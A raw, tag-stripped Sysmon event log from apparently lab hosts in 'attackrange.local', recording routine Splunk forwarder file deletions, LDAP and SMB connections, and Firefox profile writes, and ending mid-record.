354300x8000000000000000810608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:10.300{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57481-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:12.105{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1211D3417B6950C3E77E87E0D8CF235,SHA256=9048F95C27ECCA430529390CEFF6569D108EF5D92D2A9F62D6E3821E111E5F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:12.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58A56A9D7E5E9457A8AFD4F771D6879E,SHA256=0155162BA88119DDD92BC3544E630FFCEDADBAAB20F655E164E59AC11246FE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:13.952{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A93FEA854CEA9273C2B9E838A8EC6F,SHA256=E47D936CB7BDE8826E783B1AE1FD10AF89037A62B6CA6CD1A5C07DD0D0C2F677,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:13.136{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAF4C9ECD5FE2FCA2EB816077339825A,SHA256=A1200FD7A8BD4EF3FB4EE62A9E7E843AD54E9611FF97C431924C6DD82D2D1AB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.069{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61993-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001055243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:05.069{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61993-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001055242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.982{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61992-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.982{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61992-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:04.967{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61991-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.967{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61991-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:04.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61990-false10.0.1.12-8000- 23542300x80000000000000001055246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:14.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29465E74D158A7F43406590FCA43BB8B,SHA256=ECB1935A5A68D4D92CC89684FC85D0C2EE905815F2A502CAFFAA874D4904B633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:14.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BCF7AEA25CED801CE9E6D3913B9108A,SHA256=1B11E8811FFCE462296921E127C26F22264CB13A359E87921BBF8FBC33111E2D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:15.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C1256ADB09C8CF8A55F20E09806962,SHA256=0A04AB08450B7AF84BBCB3447ED1B0A2923C0E772178F013ED8DE36002C8BCBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:15.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB50EC7DA8CACE8973E1CD7C95D7279B,SHA256=A10854567D946F1A0FB41AD56FC6D41A1F0F548ED0ECB685E162857D0BC467A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.130{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61994-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:08.130{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61994-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001055247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:15.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBC14FB52A0352AA2AD8EFB664D35515,SHA256=4750747C858960325AD5B12CC60C4C29EAEF7ACF3C5DAA35B1EB386712B04F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:16.210{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17BDD962B4FB738DDCF1898076025AED,SHA256=7406F485B1DE9C17D1AF8F9FC3C5FEB3E666A714E66918A1DB4D4A88D03B68CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:17.226{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC26968317CF3F384EA2D917C1992CD8,SHA256=EF163607DE689AF9F263D0C91936CDD7F37BC7F30AA9ED0D2F5FA0D233ED763B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60E5F9B0C18F4051052E08C897AD9A7C,SHA256=49141171C897AC3DF2CACB8E294C5EC7752C0479177DE193854D2F37FBE47EDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3A3E657B34758096AD3322A8A320A72C,SHA256=08F8E22E99F1654713944DB21B0AFBD46DFF4B5702F614AF965FA88E1A65019B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E2D6D89B67BDF820D4B6BF76C200BAE5,SHA256=65965AACB99FDF3F257A28FD683A4EC90A3A1D005ECDC1D501C9329DE6DD762D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F22DD5A2F8571E2D6FA0CD4B835584DF,SHA256=900BB82E6F53890E665E85BEEA08C34A2E4DBEA6158B41FEFF159E9A15A23389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=99E646EA4D182E8DA4DF7FFD568E9855,SHA256=45DB3325C3881E91BFFAD543C359F62C7031C635AAD766507DC6F23CF051EAAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D9A3D8489341419AF70D3C95A5A0601C,SHA256=EF6262E5FE1D480FB3FAA677DD8AE527ED9BC77FC2BB8F8724BD9A31A0C55BA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=46D914BB96ADAA692B8854E404A5A93A,SHA256=E1090A7DA879A70CDB1DBA31CF012BAF8B1662E935E28B71E090832F3AE604B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68E4FAD9EB73B5DC7AEDB04C80EE0D8B,SHA256=20A1D11DA6F1AC05EE0F4BB93C55CB8D5FA91D0177D54E9E860EE022F4323210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.588{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=588C830C04EC39B9E10F8EC6802668D4,SHA256=9F2A739BAD1CCD7374AB6CB8E98D2827F078AA0AB732832F58149277D2013D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=138D6E71735DF65C4327EA12FD1DB742,SHA256=799FE911B4E21988466C1A81757BDAE44ADAB3190CDDFD94A8DEFC27A82B6043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.586{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F00DF9876EE6EECE0F8972F3392DE6E2,SHA256=1E62D0F290393B3F13ED2C430E3D7A2E52F742FEE8B19DB54480D6C9E9E944D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:17.004{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A014F4AC60D5C693A068E7B084E95F,SHA256=519092731D906B7E158748E4C99B008F1B5B940E54B1B66F8F202FD686F5FBCC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:15.313{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57482-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:18.242{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84634B09BCA842D8201B10979BDECF56,SHA256=C9274002FCC4BDFBAE62CD8C243AC1572E00FBC561B1CB663840FC1C8E8F1F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:18.583{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:18.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A26F352D5A76263F57D8CB4EA929F1,SHA256=E6D5399BA4C01EB0F1C144089FBB00D118A0E149744A6FE5A7D3C659BD70DE9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:19.289{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC644168FF2186B97AAA2D29C9B2BD02,SHA256=62AD113E48C2536DD436184576ECEAD15D2F8EA5EC6293C3C4288C33AE7C28E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:19.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE166B1C191EFB0DBC55A08732460AB,SHA256=44BE18EC7EE0D318019A5DFE1DF21274971DDEC4755E9660DE0F4614DE6873AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:10.606{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61995-false10.0.1.12-8000- 23542300x8000000000000000810618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:20.898{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:20.335{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCFDBDB39E9D02421B13C93C80212FF2,SHA256=5467693D19B29D8333CE282861806009D8D78B148338033052CB816D6656D722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:20.020{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A98C341E451D66035F9B76F67B7D94D,SHA256=AEF16F938F7166C8CEAD55542FBB381C0596A9129DA6AB5B76B3494F8268F554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D475537388C67370E26576829DA6E70,SHA256=951F165725EA5999E46395F808301C9E21C502CD6DFA9B3429C6ADC14122E3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:21.022{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B301362C4A3B741809028F2D0D963EE,SHA256=8690D44F8F8F6351E4C172B17C835D61DB1FAC8C31DCCA1318FE57AA63C94D6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.219{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57484-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000810621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:21.031{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57483-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000810620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:22.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AE029BD71495C2F0E39FF6A08E09DD,SHA256=F6F973694A11F3BE260897D197E8812E5A1FCB4FCD327FF6E364B6FD913B5A74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:22.036{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B4985D08DAD4326FE2797AFA0308F8A,SHA256=9B5D774DFC69833514E0E22DC4D9E61B588A515F35B9C5465DC214A635640083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:23.367{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F75B5BC0A9331550383CEE50BDD02F69,SHA256=CC14FB327BA17F2519DFCCF2963F2A09B3629C6FD36AE621267EF8C3B5C45EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C12271B180A4BA35A56747AEED5934F,SHA256=1E6E62E9C4639856FEFD727D0A1DF3CBDDD7F76BA5BF37DAF8787C065933D5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04D24DCB185933DFA94992E28C7F05C0,SHA256=AA53AB6D8530C3E054DEB6A95C69CA2CBDC1C2F5354AEB9E5E652A503CDA3D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:23.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6433B3003E6ABC6835BDF59B3ED71393,SHA256=EB1232EFC4482256FAACF4953284610716C6C85711BA7FE8F2DAC1D6992C7015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.368{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B62E4BE5F3793894EC4D2FE8AF7CF9,SHA256=CBC2E6188A4E63D46D7EC1E325A338B1159C1B38E041FE10FBCD5042F8AA13B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:24.053{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
